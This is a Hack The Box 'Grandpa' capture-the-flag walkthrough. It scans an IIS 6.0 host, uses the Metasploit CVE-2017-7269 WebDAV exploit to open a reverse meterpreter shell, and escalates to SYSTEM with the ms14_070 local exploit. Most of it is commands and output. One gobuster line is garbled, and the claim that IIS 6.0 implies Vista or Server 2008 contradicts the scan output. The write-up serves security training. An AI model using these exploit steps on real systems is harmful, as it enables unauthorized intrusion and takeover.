HTB Grandpa

$nmap -T4 -sV -A -p- 10.10.10.14

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 08:59 CEST
Nmap scan report for 10.10.10.14
Host is up (0.050s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Mon, 20 Jul 2020 07:00:51 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.27 seconds

Open Ports:

  • 80/tcp open http Microsoft IIS httpd 6.0

This format seems to be an old version of IIS.
According to https://es.wikipedia.org/wiki/Internet_Information_Services, we are working with a Windows Vista (Solo Business y Ultimate) y Windows Server 2008.

$gobuster dir -u 10.10.10.14 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.14/home/ruben/.config/joplin-desktop/resources/27d8b312748f4c76b28427120ac881a8.png/home/ruben/.config/joplin-desktop/resources/27d8b312748f4c76b28427120ac881a8.png/home/ruben/.config/joplin-desktop/resources/27d8b312748f4c76b28427120ac881a8.png
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/20 09:16:42 Starting gobuster
===============================================================
http://10.10.10.14/_private (Status: 403)
http://10.10.10.14/_vti_bin (Status: 301)
http://10.10.10.14/_vti_cnf (Status: 403)
http://10.10.10.14/_vti_log (Status: 403)
http://10.10.10.14/_vti_pvt (Status: 403)
http://10.10.10.14/_vti_bin/shtml.dll (Status: 200)
http://10.10.10.14/_vti_bin/_vti_adm/admin.dll (Status: 200)
http://10.10.10.14/_vti_bin/_vti_aut/author.dll (Status: 200)
http://10.10.10.14/_vti_txt (Status: 403)
http://10.10.10.14/aspnet_client (Status: 403)
http://10.10.10.14/images (Status: 301)
http://10.10.10.14/Images (Status: 301)
===============================================================
2020/07/20 09:17:03 Finished
===============================================================

$nikto -h 10.10.10.14

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-07-20 09:13:52 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH UNLOCK MKCOL PROPFIND LOCK PROPPATCH COPY listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8015 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time:           2020-07-20 09:20:54 (GMT2) (422 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Seems that IIS 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269).
Let’s follow this path.

More information about this vulnerability can be found here:
https://blog.trendmicro.com/trendlabs-security-intelligence/iis-6-0-vulnerability-leads-code-execution/
https://www.cvedetails.com/cve/CVE-2017-7269/

We’ve found out that there is a Metasploit module related to this vulnerability.

msf5 > search ScStoragePathFromUrl

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf5 > use 0

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > 

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (176195 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.14:1031) at 2020-07-20 10:04:28 +0200

meterpreter >

meterpreter > getuid

[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > sysinfo 

Computer        : GRANPA
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

meterpreter > shell

[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2992 created.
Channel 4 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\Documents and Settings>

c:\Documents and Settings>whoami

whoami
nt authority\network service

c:\Documents and Settings>

meterpreter > run post/multi/recon/local_exploit_suggester

[ ] 10.10.14.8 - Collecting local exploits for x86/windows...
[ ] 10.10.14.8 - 34 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.14.8 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.14.8 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.14.8 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.14.8 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.14.8 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.14.8 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
meterpreter >

Let’s try first targets that appears to be vulnerable:

meterpreter > background

[ ] Backgrounding session 1...

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_058_track_popup_menu

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/ms14_058_track_popup_menu) > options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.94.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1

session => 1

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.8

lhost => 10.10.14.8

msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_058_track_popup_menu) > 

msf5 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.94.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.8
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > 

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1

[*] Starting interaction with 1...

meterpreter > 

meterpreter > getpid

Current pid: 3712

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 228   1076  cidaemon.exe                                                    
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 328   1076  cidaemon.exe                                                    
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 588   396   svchost.exe                                                     
 664   1076  cidaemon.exe                                                    
 676   396   svchost.exe                                                     
 736   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1076  396   cisvc.exe                                                       
 1120  396   svchost.exe                                                     
 1180  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1328  396   VGAuthService.exe                                               
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1632  396   alg.exe                                                         
 1652  396   svchost.exe                                                     
 1828  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe                                                     
 2304  588   wmiprvse.exe                                                    
 2344  348   logon.scr                                                       
 2756  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2824  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2972  3712  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
 3712  2756  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > 

We’re working as the process rundll32.exe that it is not owned by network service that is who we are.
We should then migrate to a process owned by us.

Let’s migrate to the process 1828.

meterpreter > migrate 1828

[*] Migrating from 3712 to 1828...
[*] Migration completed successfully.
meterpreter >

Let’s repeat the Metasploit module execution.

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (176195 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.14:1031) at 2020-07-22 19:11:50 +0200

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter > 

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 16:32:01 +0200  Harry
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:31 +0200  NetworkService

meterpreter > cd Harry 
meterpreter > cd Desktop
meterpreter > cat user.txt 

bdffXXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > cd Administrator/Desktop
meterpreter > cat root.txt

9359XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *